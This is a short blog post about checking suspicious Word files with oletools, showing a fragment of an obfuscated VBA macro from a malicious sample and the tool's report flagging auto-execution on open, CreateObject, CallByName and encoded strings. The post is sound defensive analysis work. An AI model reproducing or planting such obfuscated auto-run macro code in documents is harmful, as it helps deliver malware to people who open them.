Obfuscated VBA macros in word files / 2016-06-07

2016-06-07 Obfuscated VBA macros in word files 1 year ago
I wanted to look at some suspicious word files to see whether the macros tried anything funny. Some searching showed me oletools which can do this and report. A sample:
Public Sub ZkBWG(ByVal uSHdvTl As String)
Dim RxXFgnMOu As Integer
VOyiBpZDIb.cFRHErvQ OdAkk.VWUUdYKG(553, JocsGn("PlJlXeAhESM.MtxpOizrMccS2W")), _
uSHdvTl, JocsGn("LcxeVxVE")
End Sub
Private Function xcOdDXhiP() As Integer
Dim NJuBRTz As String
Dim RemmeQk As Integer
xcOdDXhiP = 400
End Function
Private Function JocsGn(ByVal gAVndNSJ As String) As String
JocsGn = ZYkwp.kYxFEH(gAVndNSJ)
End Function

+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| AutoExec   | Document_Open  | Runs when the Word document is opened   |
| Suspicious | CreateObject   | May create an OLE object                |
| Suspicious | CallByName     | May attempt to obfuscate malicious      |
|            |                | function calls                          |
| Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
|            |                | be used to obfuscate strings (option    |
|            |                | --decode to see all)                    |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+

Tags: , ,

, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
RSS
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews, Weather maps
This page generated in 0.004806 seconds.